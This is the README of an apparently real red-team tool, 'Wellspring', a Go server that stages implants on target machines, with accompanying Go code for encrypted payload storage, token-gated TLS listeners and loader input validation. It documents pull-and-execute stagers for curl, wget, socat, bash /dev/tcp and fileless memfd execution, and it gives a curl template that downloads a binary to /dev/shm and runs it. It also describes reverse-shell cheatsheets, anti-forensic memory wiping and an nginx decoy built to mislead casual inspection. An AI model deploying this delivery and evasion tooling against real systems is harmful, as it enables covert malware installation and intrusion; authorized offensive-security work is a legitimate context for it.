Wellspring

Payload delivery server for authorized red team engagements.

Single Go binary, zero external dependencies. Wellspring manages payload staging over TLS with token-gated access, auto-expiry, and modular stager generation. Socat is the primary delivery method with fallbacks for curl, wget, python, netcat, perl, and fileless (memfd) execution.


Table of Contents

Highlights · Quick Start · Usage · Delivery Methods · Architecture · Security · Project Structure · Testing

Highlights

Token-Gated Access

Every payload requires a valid token with configurable TTL, max uses, and source IP/CIDR lock. The token store is indexed by HMAC-SHA256(token) under a secret key rather than by the raw token, so the byte-by-byte comparison inside a map lookup cannot be steered by attacker-chosen prefixes. Expired and exhausted tokens are purged automatically with sensitive field zeroing.

12 Delivery Methods

Socat TLS, socat TCP, socat memfd, socat PTY, curl, wget, bash /dev/tcp, python urllib, netcat, perl IO::Socket::SSL, memfd_create fileless, and /dev/shm tmpfs staging. Every loader validates inputs against a strict per-field character whitelist.

Encrypt at Rest

All payloads are held in memory only as AES-256-GCM ciphertext. Plaintext is zeroed immediately after delivery; runtime.KeepAlive pins the buffer live past the zeroing loop so the stores are not dropped as dead writes. Encryption keys and HMAC keys are zeroed on exit.
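The encrypt-at-rest path described above, written out as an added example for this page (it is not Wellspring's own manager.go or encrypt.go): a payload is sealed with AES-256-GCM under a random 256-bit key, the caller's plaintext buffer is wiped as soon as the ciphertext exists, and delivery decrypts, writes, and wipes again with runtime.KeepAlive guarding the wipe. Binding the payload name as GCM associated data and using a plain io.Writer as the connection are assumptions for illustration; the payload bytes are constructed.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"fmt"
	"io"
	"runtime"
)

// sealedPayload is what the manager keeps: nonce and ciphertext (with the
// 16-byte GCM tag appended). The plaintext is never stored.
type sealedPayload struct {
	nonce      []byte
	ciphertext []byte
}

// zero overwrites b and then pins it live past the loop so the compiler
// cannot treat the writes as dead stores to an unreachable buffer.
func zero(b []byte) {
	for i := range b {
		b[i] = 0
	}
	runtime.KeepAlive(b)
}

// newKey draws a 32-byte AES-256 key from the OS CSPRNG.
func newKey() ([]byte, error) {
	key := make([]byte, 32)
	_, err := rand.Read(key)
	return key, err
}

func gcm(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// seal encrypts plaintext under a fresh 96-bit nonce, binds the payload name
// as associated data (assumption: so a ciphertext cannot be swapped between
// payload slots), and zeroes the caller's plaintext once it is no longer needed.
func seal(key []byte, name string, plaintext []byte) (*sealedPayload, error) {
	aead, err := gcm(key)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, aead.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	ct := aead.Seal(nil, nonce, plaintext, []byte(name))
	zero(plaintext)
	return &sealedPayload{nonce: nonce, ciphertext: ct}, nil
}

// open decrypts and authenticates; the caller owns the returned plaintext
// and must zero it after use.
func (p *sealedPayload) open(key []byte, name string) ([]byte, error) {
	aead, err := gcm(key)
	if err != nil {
		return nil, err
	}
	return aead.Open(nil, p.nonce, p.ciphertext, []byte(name))
}

// deliver is the delivery path: decrypt, write to the connection (any
// io.Writer here), and zero the plaintext before returning, even on a
// short or failed write.
func deliver(p *sealedPayload, key []byte, name string, w io.Writer) (int, error) {
	pt, err := p.open(key, name)
	if err != nil {
		return 0, err
	}
	defer zero(pt)
	return w.Write(pt)
}

func main() {
	key, _ := newKey()
	pt := []byte("\x7fELF...constructed stand-in for an implant...") // constructed
	p, err := seal(key, "undertow", pt)
	if err != nil {
		panic(err)
	}
	var sink bytes.Buffer
	n, err := deliver(p, key, "undertow", &sink)
	fmt.Println("delivered:", n, "err:", err, "source wiped:", bytes.Count(pt, []byte{0}) == len(pt))
	zero(key) // mirror the on-exit key zeroing
}
```

Tampering with a single ciphertext byte, or opening under the wrong payload name, fails authentication before any plaintext is produced, which is the property that makes a memory dump of the store useless without the key.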

Dual TLS Listeners

HTTPS on :443 serves payloads at GET /p/<token> for HTTP-based loaders. Raw TLS on :4443 reads a token from the first line and writes raw payload bytes for socat OPENSSL: connections. TLS 1.3 minimum, no downgrade.

Fileless Execution

memfd_create loaders execute payloads entirely in memory -- no file touches disk. /dev/shm staging uses tmpfs for environments where memfd is unavailable. Neither writes to persistent storage, but neither is invisible while the process lives: a memfd shows up as memfd:<name> (deleted) in /proc/<pid>/maps and under /proc/<pid>/fd, and a /dev/shm file is listable until it is unlinked, so stage, execute and remove promptly.

Anti-Forensics

SIGINT/SIGTERM trigger immediate zeroing of all payloads, tokens, and cryptographic keys before exit. Token values are overwritten in-place via unsafe.StringData on revocation, expiry, and shutdown (safe only because the server allocated those backing bytes itself; writing through a string literal would fault). A background goroutine enforces TTL purging. None of this reaches copies that already left the process: the stager printed to the console, terminal scrollback, or whatever was pasted into C2.

Decoy Infrastructure

All HTTP responses use a Server: nginx/1.24.0 header. Invalid tokens and unknown paths return an identical nginx 404 decoy page. To casual inspection (browsing, banner grabs) the server looks like a default nginx installation; header ordering and the TLS stack (Go crypto/tls rather than OpenSSL) still differ from a real nginx, so do not rely on the decoy against active fingerprinting.

Catppuccin Mocha Theme

All CLI output uses the Catppuccin Mocha palette -- teal accents, mauve highlights, and surface tones throughout the interactive operator console, banner, delivery log, and stager output.

Quick Start

# Build
make build    # Static binary -> build/wellspring

# Generate TLS cert
./build/wellspring -gencert -sni cloudflare-dns.com

# Start server
./build/wellspring -cert server.crt -key server.key

# Interactive console opens -- load a payload and generate stagers:
#   payload add ./implant --name undertow
#   generate p1 all --host 10.0.0.1 --port 443

Usage

Startup Flags

Flag          Default             Description
-listen       :443                HTTPS listener address
-raw-listen   :4443               Raw TLS listener address
-cert / -key  (auto-gen)          TLS certificate and key paths
-sni          cloudflare-dns.com  SNI/CN for auto-generated cert
-decoy        (built-in)          Path to custom HTML decoy page
-gencert                          Generate TLS cert and exit

Console Commands

Payload Management
  payload add <path> [--name N]       Load a binary (auto-detects OS/arch)
  payload list                        Show loaded payloads
  payload remove <id>                 Remove and zero memory

Stager Generation
  generate <id> <loader> [flags]      Generate one-liner stager
  generate <id> all [flags]           Generate ALL compatible stagers
    --host IP  --port PORT            Server address
    --ttl 1h  --single-use            Token constraints
    --max-uses N  --source-lock CIDR  Access restrictions

Information
  loaders                             List delivery methods
  tokens                              List active tokens
  token revoke <value>                Revoke a token
  callbacks                           Show delivery log
  cheatsheet --host IP --port PORT    Delivery technique reference

Control
  exit                                Shutdown + zero all payloads

Delivery Methods

Loader       Requires        Description
socat-tls    socat           OPENSSL pull + exec (raw TLS)
socat-tcp    socat           TCP pipe (no TLS)
socat-memfd  socat, python3  socat + memfd_create (fileless)
socat-pty    socat           PTY allocation for interactive bootstrap
curl         curl            HTTPS pull + exec
wget         wget            HTTPS pull + exec
bash-devtcp  bash            /dev/tcp raw pull (no external tools, no TLS)
python       python3         urllib HTTPS pull + exec
netcat       nc              Raw pull (no TLS)
perl         perl            IO::Socket::SSL HTTPS pull + exec
memfd        curl, python3   curl + memfd_create fileless execution
devshm       curl            /dev/shm staging (tmpfs, no disk write)

Stager Generation

Generate stagers for a loaded payload:

# Single loader
generate p1 curl --host 10.0.0.1 --port 443

# All compatible loaders at once
generate p1 all --host 10.0.0.1 --port 443

# With access restrictions
generate p1 socat-tls --host 10.0.0.1 --port 4443 --ttl 1h --single-use --source-lock 10.0.0.0/24

# Multiple uses with CIDR lock
generate p1 memfd --host 10.0.0.1 --port 443 --max-uses 5 --source-lock 192.168.1.0/24

Cheatsheet

Generate a standalone technique reference card — no payloads, no tokens, no server required:

cheatsheet --host 10.0.0.1 --port 443

Outputs all 12 delivery techniques as ready-to-use one-liners organized by category (Socat TLS, Socat TCP, HTTP/HTTPS, Raw TCP, Fileless) with host and port substituted in. Raw-protocol techniques (socat, bash /dev/tcp) become reverse shell commands. HTTP-based techniques (curl, wget, python, perl) use a <URL> placeholder for the operator's own file server.

Architecture

Dual TLS Listeners

  • HTTPS (:443) -- Serves payloads at GET /p/<token> for HTTP-based loaders (curl, wget, python, perl). All other paths, and requests with an invalid token, return the decoy nginx 404 page.
  • Raw TLS (:4443) -- After TLS handshake, reads token from first line, writes raw payload bytes. For socat OPENSSL: connections.
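Both listeners, as an added example for this page rather than Wellspring's own server.go or handlers.go: the HTTPS handler answers GET /p/<token> with payload bytes and everything else with one fixed nginx-style 404, and the raw handler implements the :4443 exchange of "one token line in, payload bytes out, close" that a `socat OPENSSL:` client speaks. The shared tls.Config enforces TLS 1.3 and disables session tickets; the HTTP server gets timeouts and a 64 KB header cap; the raw accept loop is capped by a 128-slot semaphore. The resolver signature, the exact decoy HTML, the timeout values and the demo token in main are assumptions.

```go
package main

import (
	"bufio"
	"crypto/tls"
	"io"
	"log"
	"net"
	"net/http"
	"strings"
	"time"
)

// resolver maps a presented token and client IP to payload bytes. The real
// server does TTL, use-count and CIDR checks here and decrypts on success.
// nil means "not served"; callers never distinguish a bad token from a bad path.
type resolver func(token, clientIP string) []byte

// decoy404 mimics the stock nginx error page (constructed here).
const decoy404 = "<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n" +
	"<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.24.0</center>\r\n" +
	"</body>\r\n</html>\r\n"

// httpsHandler serves GET /p/<token>; every other path and every unknown
// token gets the identical 404 under the identical Server header.
func httpsHandler(resolve resolver) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		w.Header().Set("Server", "nginx/1.24.0")
		if r.Method == http.MethodGet && strings.HasPrefix(r.URL.Path, "/p/") {
			ip, _, _ := net.SplitHostPort(r.RemoteAddr)
			if pt := resolve(strings.TrimPrefix(r.URL.Path, "/p/"), ip); pt != nil {
				w.Header().Set("Content-Type", "application/octet-stream")
				w.Write(pt)
				return
			}
		}
		w.Header().Set("Content-Type", "text/html")
		w.WriteHeader(http.StatusNotFound)
		io.WriteString(w, decoy404)
	})
}

// serveRaw is the :4443 protocol on one accepted connection: read a single
// token line, write the payload, close. A tls.Listener hands us the conn and
// performs the handshake on the first Read. On any failure the server just
// closes, with no banner and no error text for a prober to read.
func serveRaw(conn net.Conn, resolve resolver) (int, error) {
	defer conn.Close()
	conn.SetDeadline(time.Now().Add(10 * time.Second))
	// Token lines are short; refuse to buffer more than 256 bytes looking for one.
	line, err := bufio.NewReader(io.LimitReader(conn, 256)).ReadString('\n')
	if err != nil {
		return 0, err
	}
	ip, _, _ := net.SplitHostPort(conn.RemoteAddr().String())
	pt := resolve(strings.TrimRight(line, "\r\n"), ip)
	if pt == nil {
		return 0, nil
	}
	return conn.Write(pt)
}

// hardenedTLS is shared by both listeners: TLS 1.3 only, no session tickets.
func hardenedTLS(cert tls.Certificate) *tls.Config {
	return &tls.Config{
		Certificates:           []tls.Certificate{cert},
		MinVersion:             tls.VersionTLS13,
		SessionTicketsDisabled: true,
	}
}

// httpsServer adds the timeouts that defeat slow-header attacks and caps headers at 64 KB.
func httpsServer(addr string, cert tls.Certificate, resolve resolver) *http.Server {
	return &http.Server{
		Addr:           addr,
		Handler:        httpsHandler(resolve),
		TLSConfig:      hardenedTLS(cert),
		ReadTimeout:    10 * time.Second, // values are assumptions
		WriteTimeout:   60 * time.Second,
		IdleTimeout:    30 * time.Second,
		MaxHeaderBytes: 64 << 10,
	}
}

// rawAccept runs the raw listener; the semaphore blocks Accept once maxConns are in flight.
func rawAccept(ln net.Listener, resolve resolver, maxConns int) {
	sem := make(chan struct{}, maxConns)
	for {
		conn, err := ln.Accept()
		if err != nil {
			return
		}
		sem <- struct{}{}
		go func() {
			defer func() { <-sem }()
			serveRaw(conn, resolve)
		}()
	}
}

func main() {
	cert, err := tls.LoadX509KeyPair("server.crt", "server.key")
	if err != nil {
		log.Fatal(err)
	}
	resolve := func(token, _ string) []byte { // demo: the real resolver is the token store
		if token == "demo" {
			return []byte("#!/bin/sh\necho staged\n")
		}
		return nil
	}
	ln, err := tls.Listen("tcp", ":4443", hardenedTLS(cert))
	if err != nil {
		log.Fatal(err)
	}
	go rawAccept(ln, resolve, 128)
	log.Fatal(httpsServer(":443", cert, resolve).ListenAndServeTLS("", ""))
}
```

With this wiring, `curl -sk https://host:443/p/<token>` and `printf '%s\n' <token> | socat - OPENSSL:host:4443,verify=0` both receive the raw payload bytes, while `curl -sk https://host:443/anything` and a bare connect to :4443 that sends nothing receive the decoy page and a silent close respectively.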

Request Flow

Operator                    Wellspring                    Target
   |                           |                            |
   |-- payload add ----------> |                            |
   |-- generate p1 curl -----> |                            |
   |   <-- one-liner stager -- |                            |
   |                           |                            |
   |   (operator sends stager to target via C2)             |
   |                           |                            |
   |                           | <-- GET /p/<token> ------- |
   |                           | -- validate token -->      |
   |                           | -- decrypt payload -->     |
   |                           | -- deliver + zero -------->|
   |                           |                            |

Security

  • Token-gated access -- Payloads require valid tokens with configurable TTL, max uses, and source IP/CIDR lock.
  • Encrypt at rest -- All payloads stored with AES-256-GCM encryption in memory.
  • Memory zeroing -- Plaintext is zeroed after delivery; runtime.KeepAlive pins the buffer live past the zeroing loop so the stores are not dropped as dead writes. Token values are overwritten in-place via unsafe.StringData on revocation, expiry, and shutdown (safe only because the server allocated the backing bytes itself). Encryption keys and HMAC keys are zeroed on exit. Copies that already left the process (the stager on the operator's screen, scrollback, C2 traffic) are out of reach.
  • Signal handling -- SIGINT/SIGTERM trigger immediate zeroing of all payloads, tokens, and cryptographic keys before exit.
  • Anti-timing -- The token store is indexed by HMAC-SHA256(token) under a secret key rather than by the raw token. A map lookup compares key bytes with an early exit, which leaks how far a probe matched; hashing first means an attacker cannot craft probes that share a prefix with any valid index, so the leak carries no information about real tokens.
  • Shell injection prevention -- All loader inputs validated against a strict per-field character whitelist (: allowed only in host for IPv6).
  • TLS 1.3 minimum -- No downgrade to TLS 1.2. Session tickets disabled to prevent ticket extraction.
  • HTTP hardening -- Read/write/idle timeouts prevent slowloris. Max header size capped at 64KB.
  • Connection limiting -- Raw TLS listener capped at 128 concurrent connections via semaphore.
  • Consistent fingerprint -- All HTTP responses use Server: nginx/1.24.0 header. Invalid tokens return identical decoy page.
  • Auto-expiry -- Background goroutine purges expired/exhausted tokens with sensitive field zeroing.
  • Payload size limit -- 100MB maximum enforced on load; only regular files accepted.
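Token-gated access, the HMAC-keyed lookup and auto-expiry (the Token-Gated Access highlight and the token, anti-timing and auto-expiry bullets above) in one added example; this is not Wellspring's token.go. Tokens are issued with a TTL, a use cap and an optional CIDR lock, stored only under their HMAC index, checked on redemption, and swept by the purge that a background goroutine would run. The 16-byte hex token format, the error values, the injectable clock and the in-place struct reset in drop are assumptions.

```go
package main

import (
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"net/netip"
	"sync"
	"time"
)

var (
	errUnknown   = errors.New("unknown token")
	errExpired   = errors.New("token expired")
	errExhausted = errors.New("token exhausted")
	errSource    = errors.New("source address not allowed")
)

// tokenRec never holds the raw token, only its constraints; the raw value
// exists only in the stager handed to the operator.
type tokenRec struct {
	payloadID string
	expires   time.Time
	maxUses   int           // 0 = unlimited
	uses      int
	source    *netip.Prefix // nil = no source lock
}

type tokenStore struct {
	mu   sync.Mutex
	key  []byte // secret HMAC key drawn at startup, zeroed on exit
	recs map[[32]byte]*tokenRec
	now  func() time.Time // injectable clock (assumption, for testing expiry)
}

func newTokenStore() (*tokenStore, error) {
	key := make([]byte, 32)
	if _, err := rand.Read(key); err != nil {
		return nil, err
	}
	return &tokenStore{key: key, recs: map[[32]byte]*tokenRec{}, now: time.Now}, nil
}

// index is the map key, HMAC-SHA256(token). Map lookup compares bytes with an
// early exit, but without the HMAC key an attacker cannot choose probes that
// share a prefix with a valid index, so that timing reveals nothing.
func (s *tokenStore) index(token string) (idx [32]byte) {
	m := hmac.New(sha256.New, s.key)
	m.Write([]byte(token))
	copy(idx[:], m.Sum(nil))
	return idx
}

// issue mints a 128-bit random token and records TTL, use cap and CIDR lock.
func (s *tokenStore) issue(payloadID string, ttl time.Duration, maxUses int, cidr string) (string, error) {
	raw := make([]byte, 16)
	if _, err := rand.Read(raw); err != nil {
		return "", err
	}
	rec := &tokenRec{payloadID: payloadID, expires: s.now().Add(ttl), maxUses: maxUses}
	if cidr != "" {
		p, err := netip.ParsePrefix(cidr)
		if err != nil {
			return "", err
		}
		rec.source = &p
	}
	token := hex.EncodeToString(raw)
	s.mu.Lock()
	s.recs[s.index(token)] = rec
	s.mu.Unlock()
	return token, nil
}

// redeem validates a presented token from srcIP and counts the use. Expired and
// exhausted tokens are dropped as soon as they are seen; purge catches the rest.
func (s *tokenStore) redeem(token, srcIP string) (string, error) {
	s.mu.Lock()
	defer s.mu.Unlock()
	idx := s.index(token)
	rec, ok := s.recs[idx]
	if !ok {
		return "", errUnknown
	}
	if s.now().After(rec.expires) {
		s.drop(idx, rec)
		return "", errExpired
	}
	if rec.source != nil {
		ip, err := netip.ParseAddr(srcIP)
		if err != nil || !rec.source.Contains(ip) {
			return "", errSource
		}
	}
	if rec.maxUses > 0 && rec.uses >= rec.maxUses {
		s.drop(idx, rec)
		return "", errExhausted
	}
	rec.uses++
	return rec.payloadID, nil
}

// drop deletes the entry and clears the record; Wellspring additionally
// scrubs the backing bytes, which plain Go assignment does not do.
func (s *tokenStore) drop(idx [32]byte, rec *tokenRec) {
	delete(s.recs, idx)
	*rec = tokenRec{}
}

// purge is the sweep a background TTL enforcer runs on a ticker.
func (s *tokenStore) purge() int {
	s.mu.Lock()
	defer s.mu.Unlock()
	n := 0
	for idx, rec := range s.recs {
		if s.now().After(rec.expires) || (rec.maxUses > 0 && rec.uses >= rec.maxUses) {
			s.drop(idx, rec)
			n++
		}
	}
	return n
}

func main() {
	s, _ := newTokenStore()
	tok, _ := s.issue("p1", time.Hour, 1, "10.0.0.0/24") // single-use, CIDR-locked
	_, err := s.redeem(tok, "192.168.1.5")
	id, err2 := s.redeem(tok, "10.0.0.5")
	_, err3 := s.redeem(tok, "10.0.0.5")
	fmt.Println("outside CIDR:", err, "| inside:", id, err2, "| second use:", err3)
}
```

Note that a CIDR rejection does not consume a use, so a scan from outside the allowed range cannot exhaust a token before the real target fetches it.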
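The per-field character whitelist (the 12 Delivery Methods highlight and the shell-injection bullet above), as an added example that is not Wellspring's loader.go: each field that can reach a generated one-liner is checked byte by byte against the set it legitimately needs, with ':' permitted only in the host so IPv6 literals pass, and the stager template is rendered only from fields that passed. The exact whitelists, the length caps and the curl template are assumptions for illustration.

```go
package main

import (
	"errors"
	"fmt"
	"strconv"
	"strings"
)

// Per-field whitelists (assumed sets). Nothing a shell interprets, such as
// $ ` ; | & < > ( ) quotes or whitespace, appears in any of them.
const (
	alnum      = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
	hostChars  = alnum + ".-:" // ':' only here, for IPv6 literals
	nameChars  = alnum + "_-"
	tokenChars = "0123456789abcdef"
	digits     = "0123456789"
)

var errInvalid = errors.New("invalid loader input")

// onlyChars accepts s only if it is non-empty, within max bytes, and every
// byte is in allowed.
func onlyChars(s, allowed string, max int) bool {
	if s == "" || len(s) > max {
		return false
	}
	for i := 0; i < len(s); i++ {
		if strings.IndexByte(allowed, s[i]) < 0 {
			return false
		}
	}
	return true
}

// stagerArgs are the operator-supplied fields that end up inside a one-liner.
type stagerArgs struct {
	host, port, token, name string
}

func (a stagerArgs) validate() error {
	if !onlyChars(a.host, hostChars, 253) {
		return fmt.Errorf("%w: host", errInvalid)
	}
	if p, _ := strconv.Atoi(a.port); !onlyChars(a.port, digits, 5) || p < 1 || p > 65535 {
		return fmt.Errorf("%w: port", errInvalid)
	}
	if !onlyChars(a.token, tokenChars, 64) {
		return fmt.Errorf("%w: token", errInvalid)
	}
	if !onlyChars(a.name, nameChars, 32) {
		return fmt.Errorf("%w: name", errInvalid)
	}
	return nil
}

// urlHost brackets IPv6 literals so host and port stay unambiguous in a URL.
func (a stagerArgs) urlHost() string {
	if strings.Contains(a.host, ":") {
		return "[" + a.host + "]"
	}
	return a.host
}

// curlStager renders a curl pull-and-exec one-liner. The template is a
// hypothetical shape, not Wellspring's loader text; nothing is interpolated
// until validate() has passed.
func curlStager(a stagerArgs) (string, error) {
	if err := a.validate(); err != nil {
		return "", err
	}
	dst := "/dev/shm/" + a.name
	return fmt.Sprintf("curl -sk https://%s:%s/p/%s -o %s && chmod +x %s && %s",
		a.urlHost(), a.port, a.token, dst, dst, dst), nil
}

func main() {
	for _, a := range []stagerArgs{
		{"10.0.0.1", "443", "0123456789abcdef0123456789abcdef", "undertow"},
		{"10.0.0.1;id", "443", "0123456789abcdef0123456789abcdef", "undertow"}, // injection attempt
	} {
		s, err := curlStager(a)
		fmt.Printf("host %q -> %q err=%v\n", a.host, s, err)
	}
}
```

Rejecting at the field level rather than escaping is the point: a value such as `10.0.0.1;id` or a name containing backticks is refused outright, so there is no escaping routine whose edge cases a quoting context could defeat.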

Project Structure

cmd/wellspring/main.go          Entry point, flags, server+CLI init
internal/
  server/
    server.go                   Dual TLS listener setup
    handlers.go                 /p/<token> delivery, raw TLS handler, decoy
    tls.go                      ECDSA P-256 self-signed cert generation
  payload/
    payload.go                  ELF/PE arch detection
    manager.go                  Add/remove/list/get with encrypt-at-rest
    token.go                    Token generation, validation, TTL, source-lock
    encrypt.go                  AES-256-GCM encryption
  loader/
    loader.go                   Loader interface, input validation
    registry.go                 Auto-registration via init()
    *.go                        12 delivery method implementations
  callback/tracker.go           In-memory delivery event log
  antiforensics/expiry.go       Background TTL enforcer, memory zeroing
  cli/
    cli.go                      Interactive operator console
    banner.go                   ASCII art banner
    colors.go                   Catppuccin Mocha palette
  theme/theme.go                Shared ANSI color constants

Testing

go test ./... -race -count=1 -v

53 tests covering payload encryption, token lifecycle, arch detection, shell injection prevention, HTTPS delivery, raw TLS delivery, server header consistency, ring buffer compaction, and anti-forensics.

Requires Go 1.21+.



This tool is intended exclusively for authorized red team engagements and security testing with proper written authorization. Unauthorized use against systems you do not own or have permission to test is illegal.
